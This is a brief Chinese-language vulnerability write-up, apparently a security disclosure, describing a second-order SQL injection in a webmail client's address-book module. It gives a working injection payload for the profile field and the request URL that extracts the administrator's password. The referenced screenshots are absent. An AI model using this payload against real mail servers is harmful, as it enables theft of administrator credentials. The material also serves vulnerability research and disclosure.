版本:最新版v9.8.57
漏洞文件 /client/oab/module/operates.php 代码
漏洞是先引入单引号,引入数据库,在个人资料处,填写如下exp,如图
',`homepage`=(SELECT password from userlist where userid=2)#
http://mail.fuck.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=test2
然后执行该漏洞函数,请求为
查看个人通讯录,找到管理员密码,如图
SQL执行的过程为